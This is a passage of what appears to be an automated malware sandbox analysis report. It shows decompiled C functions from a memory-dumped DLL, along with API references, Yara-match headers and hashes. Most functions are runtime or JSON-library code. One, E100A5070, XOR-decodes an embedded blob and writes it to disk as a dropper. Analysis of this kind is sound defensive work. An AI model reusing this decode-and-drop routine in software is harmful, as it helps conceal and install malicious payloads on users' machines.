						_v192 = _t400 - 0xc;
						E1000B240(_t400 - 0xc,  &_v36);
						_t199 = E1000C4C0(__eflags);
					}
					_v8 = 0xffffffff;
				}
				 *[fs:0x0] = _v16;
				return _t199;
			}







































































                                                  0x10009db3
                                                  0x10009db5
                                                  0x10009dc0
                                                  0x10009dc1
                                                  0x10009dc8
                                                  0x10009dc9
                                                  0x10009dd2
                                                  0x10009dd5
                                                  0x10009dde
                                                  0x10009dfe
                                                  0x10009e0d
                                                  0x10009e19
                                                  0x10009e22
                                                  0x1000a091
                                                  0x1000a09b
                                                  0x1000a09e
                                                  0x1000a189
                                                  0x1000a19b
                                                  0x1000a19e
                                                  0x1000a1a1
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a1d0
                                                  0x1000a195
                                                  0x1000a195
                                                  0x1000a198
                                                  0x1000a198
                                                  0x1000a1f6
                                                  0x1000a1fd
                                                  0x1000a203
                                                  0x1000a209
                                                  0x1000a21b
                                                  0x1000a221
                                                  0x1000a225
                                                  0x1000a22a
                                                  0x1000a238
                                                  0x1000a23d
                                                  0x1000a242
                                                  0x1000a262
                                                  0x1000a267
                                                  0x1000a26c
                                                  0x1000a276
                                                  0x1000a281
                                                  0x1000a282
                                                  0x1000a290
                                                  0x1000a291
                                                  0x1000a296
                                                  0x1000a2a4
                                                  0x1000a2ae
                                                  0x1000a2b8
                                                  0x1000a2bd
                                                  0x1000a2c5
                                                  0x1000a2cf
                                                  0x1000a0a4
                                                  0x1000a0aa
                                                  0x1000a0b8
                                                  0x1000a0b8
                                                  0x1000a0bc
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a0c8
                                                  0x1000a0b2
                                                  0x1000a0b2
                                                  0x1000a0b5
                                                  0x1000a0b5
                                                  0x1000a0cf
                                                  0x1000a0e1
                                                  0x1000a0e4
                                                  0x1000a0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a110
                                                  0x1000a0db
                                                  0x1000a0db
                                                  0x1000a0de
                                                  0x1000a0de
                                                  0x1000a136
                                                  0x1000a13d
                                                  0x1000a143
                                                  0x1000a149
                                                  0x1000a14f
                                                  0x1000a150
                                                  0x1000a155
                                                  0x1000a163
                                                  0x1000a16d
                                                  0x1000a177
                                                  0x1000a17c
                                                  0x1000a181
                                                  0x1000a300
                                                  0x10009e28
                                                  0x10009e28
                                                  0x10009e35
                                                  0x10009f20
                                                  0x10009f2e
                                                  0x10009f2e
                                                  0x10009f32
                                                  0x00000000
                                                  0x00000000
                                                  0x10009f5b
                                                  0x10009f28
                                                  0x10009f28
                                                  0x10009f2b
                                                  0x10009f2b
                                                  0x10009f81
                                                  0x10009f88
                                                  0x10009f8e
                                                  0x10009f94
                                                  0x10009fa3
                                                  0x10009fa9
                                                  0x10009fad
                                                  0x10009fb2
                                                  0x10009fbc
                                                  0x10009fc1
                                                  0x10009fc6
                                                  0x10009fd4
                                                  0x10009fd9
                                                  0x10009fde
                                                  0x10009fec
                                                  0x10009ff7
                                                  0x10009ff8
                                                  0x1000a003
                                                  0x1000a004
                                                  0x1000a009
                                                  0x1000a017
                                                  0x1000a021
                                                  0x1000a040
                                                  0x1000a045
                                                  0x1000a04d
                                                  0x1000a054
                                                  0x10009e3b
                                                  0x10009e41
                                                  0x10009e4f
                                                  0x10009e5f
                                                  0x10009e4c
                                                  0x10009e4c
                                                  0x10009e69
                                                  0x10009e77
                                                  0x10009e77
                                                  0x10009e7b
                                                  0x00000000
                                                  0x00000000
                                                  0x10009ea4
                                                  0x10009e71
                                                  0x10009e71
                                                  0x10009e74
                                                  0x10009e74
                                                  0x10009eca
                                                  0x10009ed1
                                                  0x10009ed7
                                                  0x10009edd
                                                  0x10009ee3
                                                  0x10009ee4
                                                  0x10009ee9
                                                  0x10009ef7
                                                  0x10009f01
                                                  0x10009f0b
                                                  0x10009f10
                                                  0x10009f15
                                                  0x1000a085
                                                  0x1000a085
                                                  0x1000a30a
                                                  0x1000a317

                                                  APIs
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009F0B
                                                    • Part of subcall function 1000B500: allocator.LIBCPMTD ref: 1000B581
                                                    • Part of subcall function 1000B500: allocator.LIBCONCRTD ref: 1000B5B8
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009FBC
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 1000A177
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocatorDebugHeap$allocator
                                                  • String ID:
                                                  • API String ID: 814207127-0
                                                  • Opcode ID: 494bc7cbfefbd4af1a48fb8f43ad780c074b8891893442d4f25d9ad707f55186
                                                  • Instruction ID: 41ddcd4d4e2439ec11f7f95cf3f6457dad3d7385cba3bae317198d3843e05920
                                                  • Opcode Fuzzy Hash: 494bc7cbfefbd4af1a48fb8f43ad780c074b8891893442d4f25d9ad707f55186
                                                  • Instruction Fuzzy Hash: E0F10975E1021CDFDB14DFA8C991AEEB7B5FF88340F108199E50667259DA30AE84CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100A5070, Relevance: 7.6, APIs: 5, Instructions: 62fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E100A5070(void* __edx, void* __eflags, CHAR* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				void* __ebp;
				void* _t37;
				void* _t47;
				void* _t48;

				_v20 = 0;
				_v12 = E100253AE(_t37, __edx, _t47, _t48, 0x194d0);
				_v24 = 0;
				while(_v24 < 0x194d0) {
					_t8 = _v24 + 0x103e0688; // 0x101d0c94
					 *((char*)(_v12 + _v24)) =  *_t8 & 0x000000ff ^ 0x0000007b;
					_v24 =  &(_v24->Internal);
				}
				_v16 = 0;
				_v8 = 0;
				_v16 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0);
				__eflags = _v16 - 0xffffffff;
				if(__eflags != 0) {
					WriteFile(_v16, _v12, 0x194d0,  &_v8, 0);
					CloseHandle(_v16);
					__eflags = PathFileExistsA(_a4);
					if(__eflags != 0) {
						_v20 = 1;
					}
				}
				_push(_v12);
				E100252D1(_t37, _t47, _t48, __eflags);
				return _v20;
			}












                                                  0x100a5076
                                                  0x100a508a
                                                  0x100a508d
                                                  0x100a509f
                                                  0x100a50ab
                                                  0x100a50bb
                                                  0x100a509c
                                                  0x100a509c
                                                  0x100a50bf
                                                  0x100a50c6
                                                  0x100a50e6
                                                  0x100a50e9
                                                  0x100a50ed
                                                  0x100a5102
                                                  0x100a510c
                                                  0x100a511c
                                                  0x100a511e
                                                  0x100a5120
                                                  0x100a5120
                                                  0x100a511e
                                                  0x100a512a
                                                  0x100a512b
                                                  0x100a5139

                                                  APIs
                                                  • _malloc.LIBCMT ref: 100A5082
                                                    • Part of subcall function 100253AE: __FF_MSGBANNER.LIBCMT ref: 100253D1
                                                    • Part of subcall function 100253AE: __NMSG_WRITE.LIBCMT ref: 100253D8
                                                    • Part of subcall function 100253AE: HeapAlloc.KERNEL32(00000000,1002359C,?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 10025426
                                                  • CreateFileA.KERNEL32(100A5BC9,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100A50E0
                                                  • WriteFile.KERNEL32(000000FF,100A5BC9,000194D0,00000000,00000000), ref: 100A5102
                                                  • CloseHandle.KERNEL32(000000FF), ref: 100A510C
                                                  • PathFileExistsA.SHLWAPI(100A5BC9), ref: 100A5116
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AllocCloseCreateExistsHandleHeapPathWrite_malloc
                                                  • String ID:
                                                  • API String ID: 2118286245-0
                                                  • Opcode ID: 61b09c0408fb9ea785b5fb69041387967dcff77d14f2c74783d8dd2ba4d3c2a3
                                                  • Instruction ID: 4cf81658cd053e6dee7f4edc1ca3d44c03c2af5dc6a49d26cd4c721072dae72a
                                                  • Opcode Fuzzy Hash: 61b09c0408fb9ea785b5fb69041387967dcff77d14f2c74783d8dd2ba4d3c2a3
                                                  • Instruction Fuzzy Hash: 8B214FB4900208EBDB10DFE4CC85FEE7BB5FB44305F204554E511BB281D776AA84CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10145DD0, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10145DD0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E10023280(_a4);
				_t18 = E10023280(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E10023280(_a8);
						_t21 = E10023280(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E10023B6E(_t30, _a8, _t38, _v8, _a8, E10023280(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}















                                                  0x10145dd0
                                                  0x10145dd0
                                                  0x10145ddb
                                                  0x10145de9
                                                  0x10145dee
                                                  0x10145df3
                                                  0x10145dfe
                                                  0x10145e01
                                                  0x10145e1c
                                                  0x10145e20
                                                  0x10145e31
                                                  0x10145e36
                                                  0x10145e3b
                                                  0x00000000
                                                  0x00000000
                                                  0x10145e52
                                                  0x10145e57
                                                  0x10145e5c
                                                  0x10145e10
                                                  0x10145e19
                                                  0x00000000
                                                  0x10145e19
                                                  0x00000000
                                                  0x10145e5e
                                                  0x00000000
                                                  0x10145e67
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: cc20ad91008c13126a571b799b31833ff96000464e7d0fc5089879dbb14974e9
                                                  • Instruction ID: b4782cba6e62bd4db5a1c29794b12e8e3c6f9565afb32b82682393525f62ffa6
                                                  • Opcode Fuzzy Hash: cc20ad91008c13126a571b799b31833ff96000464e7d0fc5089879dbb14974e9
                                                  • Instruction Fuzzy Hash: 131124BAD00108F7DB00DBA8E8419CEB7A8DB04258F55C565ED09E7302E639EF5497A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100252D1, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E100252D1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1027d170);
				_t8 = E1002EB4C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E1002EB91(_t8);
				}
				if( *0x1040508c != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x104018b4, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = L10028DE9(_t31);
						 *_t10 = E10028DAE(GetLastError());
					}
					goto L9;
				}
				E1002E01C(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1002E095(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1002E0C0();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E10025327();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                  0x100252d1
                                                  0x100252d3
                                                  0x100252d8
                                                  0x100252dd
                                                  0x100252e2
                                                  0x10025359
                                                  0x1002535e
                                                  0x1002535e
                                                  0x100252eb
                                                  0x10025330
                                                  0x10025331
                                                  0x10025339
                                                  0x1002533f
                                                  0x10025341
                                                  0x10025343
                                                  0x10025356
                                                  0x10025358
                                                  0x00000000
                                                  0x10025341
                                                  0x100252ef
                                                  0x100252f5
                                                  0x100252fa
                                                  0x10025300
                                                  0x10025305
                                                  0x10025307
                                                  0x10025308
                                                  0x10025309
                                                  0x1002530f
                                                  0x10025310
                                                  0x10025317
                                                  0x10025320
                                                  0x00000000
                                                  0x10025322
                                                  0x10025322
                                                  0x00000000
                                                  0x10025322

                                                  APIs
                                                  • __lock.LIBCMT ref: 100252EF
                                                    • Part of subcall function 1002E01C: __mtinitlocknum.LIBCMT ref: 1002E030
                                                    • Part of subcall function 1002E01C: __amsg_exit.LIBCMT ref: 1002E03C
                                                    • Part of subcall function 1002E01C: EnterCriticalSection.KERNEL32(40182005,40182005,100235AB,10025381,00000004,1027D190,0000000C,1002540C,100235AB,?,00000003,?,?,100235AB,00000000,10001F33), ref: 1002E044
                                                  • ___sbh_find_block.LIBCMT ref: 100252FA
                                                  • ___sbh_free_block.LIBCMT ref: 10025309
                                                  • HeapFree.KERNEL32(00000000,100235AB,1027D170,Function_000252D1,1002DFFD,00000000,1027D5F0,0000000C,1002E035,100235AB,40182005,100235AB,10025381,00000004,1027D190,0000000C), ref: 10025339
                                                  • GetLastError.KERNEL32(?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 1002534A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2714421763-0
                                                  • Opcode ID: afe961262780276a61c4e52276af1ad014fbbb2c28883b0c4c4ea41faaf10445
                                                  • Instruction ID: 78dd0faed67d6c3e5babdeb856c86d41edc325d1290f50be89b4402b40a0d59f
                                                  • Opcode Fuzzy Hash: afe961262780276a61c4e52276af1ad014fbbb2c28883b0c4c4ea41faaf10445
                                                  • Instruction Fuzzy Hash: 1001DB36841351EADB20DF71BC46B8E3BB0EF003A1FD45115F405AA0D2DB75AE80DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1013AC90, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E1013AC90(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v152;
				char _v180;
				char _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				void* __ebp;
				intOrPtr _t76;
				void* _t77;

				_t75 = __esi;
				_t74 = __edi;
				_t56 = __ebx;
				_push(0xffffffff);
				_push(0x1016d548);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t76;
				_t77 = _t76 - 0xc8;
				if(_a8 > 0x7ffffffa) {
					E10006F20( &_v152, 2, 1);
					_v8 = 0;
					E1000FF20( &_v152,  &_v152, "in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing");
					_t77 = _t77 + 8;
					_v212 = E10007040( &_v152,  &_v180);
					_v216 = _v212;
					_v8 = 1;
					E10138DD0(_v216);
					_v8 = 0;
					E10001360( &_v180);
					E10026CE8(__ebx, _v212, __edi, __esi);
					_v8 = 0xffffffff;
					E10005930( &_v152, __esi);
				}
				_v24 = _a8 + 5;
				_v20 = E100253AE(_t56, _v24, _t74, _t75, _v24);
				if(_v20 == 0) {
					E10001320( &_v208, "in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer");
					_v8 = 2;
					E10138E00( &_v208);
					_v8 = 0xffffffff;
					E10001360( &_v208);
				}
				 *_v20 = _a8;
				E10023600(_t56, _t74, _t75, _v20 + 4, _a4, _a8);
				 *((char*)(_v20 + _v24 - 1)) = 0;
				 *[fs:0x0] = _v16;
				return _v20;
			}















                                                  0x1013ac90
                                                  0x1013ac90
                                                  0x1013ac90
                                                  0x1013ac93
                                                  0x1013ac95
                                                  0x1013aca0
                                                  0x1013aca1
                                                  0x1013aca8
                                                  0x1013acb5
                                                  0x1013acc5
                                                  0x1013acca
                                                  0x1013acdd
                                                  0x1013ace2
                                                  0x1013acf7
                                                  0x1013ad03
                                                  0x1013ad09
                                                  0x1013ad14
                                                  0x1013ad19
                                                  0x1013ad23
                                                  0x1013ad28
                                                  0x1013ad2d
                                                  0x1013ad3a
                                                  0x1013ad3a
                                                  0x1013ad45
                                                  0x1013ad54
                                                  0x1013ad5b
                                                  0x1013ad68
                                                  0x1013ad6d
                                                  0x1013ad7b
                                                  0x1013ad80
                                                  0x1013ad8d
                                                  0x1013ad8d
                                                  0x1013ad98
                                                  0x1013ada9
                                                  0x1013adb7
                                                  0x1013adc1
                                                  0x1013adcb

                                                  APIs
                                                  • _malloc.LIBCMT ref: 1013AD4C
                                                    • Part of subcall function 10006F20: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10006F5A
                                                    • Part of subcall function 10138DD0: std::bad_exception::bad_exception.LIBCMTD ref: 10138DDD
                                                  • _abort.LIBCMT ref: 1013AD28
                                                    • Part of subcall function 10026CE8: __NMSG_WRITE.LIBCMT ref: 10026D0F
                                                    • Part of subcall function 10026CE8: _raise.LIBCMT ref: 10026D20
                                                    • Part of subcall function 10026CE8: _memset.LIBCMT ref: 10026DA3
                                                    • Part of subcall function 10026CE8: SetUnhandledExceptionFilter.KERNEL32 ref: 10026DC3
                                                    • Part of subcall function 10026CE8: UnhandledExceptionFilter.KERNEL32(?), ref: 10026DCD
                                                    • Part of subcall function 10005930: std::bad_exception::~bad_exception.LIBCMTD ref: 10005948
                                                  Strings
                                                  • in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing, xrefs: 1013ACD1
                                                  • in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer, xrefs: 1013AD5D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessorUnhandledVirtual$Concurrency::RootRoot::_abort_malloc_memset_raisestd::bad_exception::bad_exceptionstd::bad_exception::~bad_exception
                                                  • String ID: in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer$in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing
                                                  • API String ID: 1629281245-1516562270
                                                  • Opcode ID: a9bed1177c470171533d599b1af42dbcf31e6c03a2ddb0e111d23f8eaa0c7eee
                                                  • Instruction ID: 95d649545cb7e8b79e197c63ef554a18887b215f0de5f871ca54305b17fe0a37
                                                  • Opcode Fuzzy Hash: a9bed1177c470171533d599b1af42dbcf31e6c03a2ddb0e111d23f8eaa0c7eee
                                                  • Instruction Fuzzy Hash: 5F3155B5C01219EBEB14DFA4DD46BEEB7B4EF04310F5082A8E51967281DB346B04CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000BBB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E1000BBB0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v48;
				intOrPtr _v52;
				intOrPtr _t59;

				_push(0xffffffff);
				_push(0x10170888);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				E10022AB1( &_v28, 0);
				_v8 = 0;
				_v32 =  *0x10404ed8;
				_v24 = E10004A80(0x10401630);
				_t46 = _a4;
				_v20 = E10004C90(_a4, _v24);
				if(_v20 == 0) {
					if(_v32 == 0) {
						if(E10004F10(__ebx, _t46, __edi, __esi,  &_v32) != 0xffffffff) {
							_v20 = _v32;
							 *0x10404ed8 = _v32;
							_v36 = _v32;
							E10004AD0(_v36);
							E10004B70(_v36);
						} else {
							E100231FA( &_v48, "bad cast");
							E10028911( &_v48, 0x1027f3f8);
						}
					} else {
						_v20 = _v32;
					}
				}
				_v52 = _v20;
				_v8 = 0xffffffff;
				E10022AD2( &_v28);
				 *[fs:0x0] = _v16;
				return _v52;
			}













                                                  0x1000bbb3
                                                  0x1000bbb5
                                                  0x1000bbc0
                                                  0x1000bbc1
                                                  0x1000bbd0
                                                  0x1000bbd5
                                                  0x1000bbe1
                                                  0x1000bbee
                                                  0x1000bbf5
                                                  0x1000bbfd
                                                  0x1000bc04
                                                  0x1000bc0c
                                                  0x1000bc25
                                                  0x1000bc47
                                                  0x1000bc4d
                                                  0x1000bc55
                                                  0x1000bc5b
                                                  0x1000bc63
                                                  0x1000bc27
                                                  0x1000bc2f
                                                  0x1000bc3d
                                                  0x1000bc3d
                                                  0x1000bc0e
                                                  0x1000bc11
                                                  0x1000bc11
                                                  0x1000bc0c
                                                  0x1000bc6b
                                                  0x1000bc6e
                                                  0x1000bc78
                                                  0x1000bc83
                                                  0x1000bc8d

                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1000BBD0
                                                  • int.LIBCPMTD ref: 1000BBE9
                                                    • Part of subcall function 10004A80: std::_Lockit::_Lockit.LIBCPMT ref: 10004A96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LockitLockit::_std::_
                                                  • String ID: bad cast
                                                  • API String ID: 3382485803-3145022300
                                                  • Opcode ID: 3f7d5acb45878f3068c0b7c5e097225b4f9662cb05d50eb4fe93152d777a4b85
                                                  • Instruction ID: 4c2f27c851b9c4d37b77e5a1dee80e796b24b7cd594fb72cd0ee5d1fcd5963d9
                                                  • Opcode Fuzzy Hash: 3f7d5acb45878f3068c0b7c5e097225b4f9662cb05d50eb4fe93152d777a4b85
                                                  • Instruction Fuzzy Hash: FE212AB4D04609DBDB04DF94D881BEEB7B0FB48350F10862AE826733A4DB346A41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000BD90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E1000BD90(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v48;
				intOrPtr _v52;
				void* _t42;
				void* _t57;
				void* _t58;
				intOrPtr _t59;

				_push(0xffffffff);
				_push(0x10170888);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				E10022AB1( &_v28, 0);
				_v8 = 0;
				_v32 =  *0x10404edc;
				_v24 = E10004A80(0x10404f40);
				_t46 = _a4;
				_v20 = E10004C90(_a4, _v24);
				if(_v20 == 0) {
					if(_v32 == 0) {
						if(E1000C610(_t42, _t46, _t57, _t58,  &_v32) != 0xffffffff) {
							_v20 = _v32;
							 *0x10404edc = _v32;
							_v36 = _v32;
							E10004AD0(_v36);
							E10004B70(_v36);
						} else {
							E100231FA( &_v48, "bad cast");
							E10028911( &_v48, 0x1027f3f8);
						}
					} else {
						_v20 = _v32;
					}
				}
				_v52 = _v20;
				_v8 = 0xffffffff;
				E10022AD2( &_v28);
				 *[fs:0x0] = _v16;
				return _v52;
			}
















                                                  0x1000bd93
                                                  0x1000bd95
                                                  0x1000bda0
                                                  0x1000bda1
                                                  0x1000bdb0
                                                  0x1000bdb5
                                                  0x1000bdc1
                                                  0x1000bdce
                                                  0x1000bdd5
                                                  0x1000bddd
                                                  0x1000bde4
                                                  0x1000bdec
                                                  0x1000be05
                                                  0x1000be27
                                                  0x1000be2d
                                                  0x1000be35
                                                  0x1000be3b
                                                  0x1000be43
                                                  0x1000be07
                                                  0x1000be0f
                                                  0x1000be1d
                                                  0x1000be1d
                                                  0x1000bdee
                                                  0x1000bdf1
                                                  0x1000bdf1
                                                  0x1000bdec
                                                  0x1000be4b
                                                  0x1000be4e
                                                  0x1000be58
                                                  0x1000be63
                                                  0x1000be6d

                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1000BDB0
                                                  • int.LIBCPMTD ref: 1000BDC9
                                                    • Part of subcall function 10004A80: std::_Lockit::_Lockit.LIBCPMT ref: 10004A96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LockitLockit::_std::_
